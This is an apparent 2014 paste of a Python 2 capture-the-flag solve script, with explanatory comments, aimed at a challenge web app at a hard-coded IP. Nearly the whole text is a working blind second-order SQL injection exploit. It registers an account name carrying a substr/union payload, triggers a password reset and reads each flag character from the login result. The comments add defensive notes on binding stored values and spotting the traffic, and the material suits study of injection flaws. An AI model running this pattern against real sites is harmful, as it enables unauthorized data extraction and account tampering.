
Untitled

a guest Apr 14th, 2014 112 Never
  1. import random,requests,string
  2.  
  3. #20BILLION_D0LLAR_1D3A <- flag
  4. #razor4x - tasteless
  5.  
# Endpoint of the challenge application. Going by the request bodies noted
# below, the register, password-reset and login forms all POST to this one URL
# and are apparently told apart by which submit field is present:
#   register: name=blah&pass=blah&email=blah&register=Register
#   forgot:   name=blah&reset=Forgot+Password&pass=&email=
#   login:    name=blah&pass=blah&login=Login&email=
main = "http://54.196.116.77/index.php?page=login"
  10.  
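def randomword(length):
    """Return a random string of `length` ASCII lowercase letters.

    The script uses the result as a throwaway account name and password.
    The `random` module is not a cryptographic generator, so this helper is
    unsuitable for secrets or tokens.
    """
    # string.lowercase is locale-dependent in Python 2 and was removed in
    # Python 3; string.ascii_lowercase is always a-z and exists in both.
    return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))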
  13.  
# CTF write-up script (Python 2: print statement, xrange). It recovers the
# `flag` column one character at a time through what looks like a second-order
# SQL injection: the account name is stored at registration and presumably
# reused, unescaped, inside the password-reset statement.
#
# Defensive reading: parameterising only the INSERT at registration is not
# enough. Every later statement that reads the stored name back (here the
# reset path) must bind it as a parameter too. On the detection side this
# loop is noisy: four POSTs per guess, a fresh account per guess, and quote
# characters and SQL keywords in the `name` field of register/reset requests.
pwd = ""
for position in xrange(1, 22):          # flag positions 1..21
    for code in xrange(32, 122):        # candidate code points 32..121
        guess = chr(code)
        probe_user = randomword(10)

        # Step 1: a clean account whose password equals its name.
        requests.post(main, data={
            'name': probe_user,
            'pass': probe_user,
            "email": "asd",
            "register": "Register",
        })

        # Step 2: a second account whose *name* is the clean name followed by
        # a SQL fragment that compares one flag character with the guess.
        injected_name = probe_user+"' and (select if((select substr(flag,"+str(position)+",1) from flag)='"+guess+"',1,2*(select 1 union select 2)))#"
        requests.post(main, data={
            'name': injected_name,
            'pass': "asd",
            "email": "asd",
            "register": "Register",
        })

        # Step 3: password reset for the crafted name. This is the request in
        # which the stored name is presumably interpolated into a query.
        requests.post(main, data={
            'name': injected_name,
            'pass': "",
            "email": "",
            "reset": "Forgot+Password",
        })

        # Step 4: log in as the clean account with its original password.
        login_page = requests.post(main, data={
            'name': probe_user,
            'pass': probe_user,
            "email": "",
            "login": "Login",
        })

        # The script treats a missing 'Welcome' as proof that the clean
        # account's password was changed by step 3, i.e. the guess matched.
        if 'Welcome' in login_page.text:
            print "Nope..."+guess
            continue

        print "OK: "+guess
        pwd = pwd + guess
        break

print pwd